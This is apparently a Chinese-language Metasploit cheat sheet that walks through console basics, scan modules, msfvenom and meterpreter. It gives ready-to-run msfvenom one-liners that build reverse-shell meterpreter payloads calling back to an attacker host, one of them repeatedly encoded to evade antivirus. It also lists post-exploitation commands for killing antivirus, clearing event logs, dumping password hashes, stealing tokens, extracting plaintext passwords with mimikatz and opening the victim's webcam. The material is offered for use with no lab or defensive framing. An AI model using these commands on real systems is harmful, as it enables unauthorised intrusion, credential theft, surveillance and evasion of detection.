Metasploit

1、文件目录

目录所在位置:/usr/share/metasploit-framework/
data目录:里面存放一些可编辑的文件

documentation目录:文档目录,里面存放一些相关文档

lib目录:静态连接库目录

modules目录:模块目录

2、基础使用

msfdb init:初始化并启动msf数据库

msfconsole:开启msf

db_status:查看数据库状态

help:查看帮助

exit:退出msf

show:进行罗列模块

search:搜索模块

back:返回上一级

info:查看模块信息

show options:查看配置

set:设置一个值

exploit:执行模块

jobs:查看工作

kill:杀死工作

使用kage实现界面化:

    1)启动msf:msfconsole -q -x 'load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=obse Pass=123456'
2)启动kage

3、信息收集

arp扫描模块 ———— auxiliary/scanner/discovery/arp_sweep

udp扫描模块 ———— auxiliary/scanner/discovery/udp _sweep

端口扫描模块 ———— auxiliary/scanner/portscan/tcp

4、msfvenom

**常用参数**

    -l:查看列表

    -p:指定payload

    -f:指定输出格式

    -e: 指定编码方式

    -i:指定编码次数

demo

    windows ———— msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -e x86/shikata_ ga_nai -i 5 -f exe > 1.exe

    linux ———— msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -f elf > 1.elf

5、meterpreter

**基本操作**

    background:返回

    sessions -l:查看所有会话信息

    sessions -i 会话序号:与指定的会话进行交互

    pwd:查看目标当前目录

    lpwd:查看本地当前目录

    cd:切换至目标指定目录

    lcd:切换至本机的指定目录

    ls:列出目标的文件

    clearev:清理痕迹

    download:将目标文件下载到本地

    upload:将文件上传到目标

    execute:在目标执行命令的功能

         execute -f 1.exe -H(隐藏执行一个程序)

    ps:列出目标进程

    getuid:查看当前用户的身份

    getprivs: 查看用户的权限

    migrate:进程迁移命令

    getpid:查看木马进程

    shell:进入终端环境 

        chcp 65001:更改编码,防止乱码

    exit:退出终端环境

    idletime:查看目标服务器空闲时间

    sysinfo: 查看目标信息

    kill:杀死目标主机的一个进程

    shutdown:关机

    reboot:重启

    netstat:查看目标ip信息

    getsystem:尝试提权(低版本的系统才能成功)

**meterpreter下run命令的一些用法**

    run killav:杀死杀毒软件

    run hashdump:导出目标机的密码

    run post/windows/wlan/wlan_ profile: 查看wifi密码

    run vnc:实时屏幕监控

    run webcam:开启一个摄像头

    run post/windows/gather/checkvm:查看当前主机是否为虚拟机

    run post/windows/manage/enable_rdp: 开启目标的3389

**token窃取**

    load incognito:加载incognito

    list_tokens -u:列举token

    impersonate_token:窃取一个指定token

    steal_token 3306:从进程中窃取token

**mimikatz模块获取密码**

    load mimikatz:加载mimikatz模块

    msv:获取登录密码的hash值

    kerberos/wdigest/tspkg:抓取明文密码

**更新**

    apt update

    apt install metasploit-framework
文章目录
  1. 1. 1、文件目录
  2. 2. 2、基础使用
  3. 3. 3、信息收集
  4. 4. 4、msfvenom
  5. 5. 5、meterpreter
|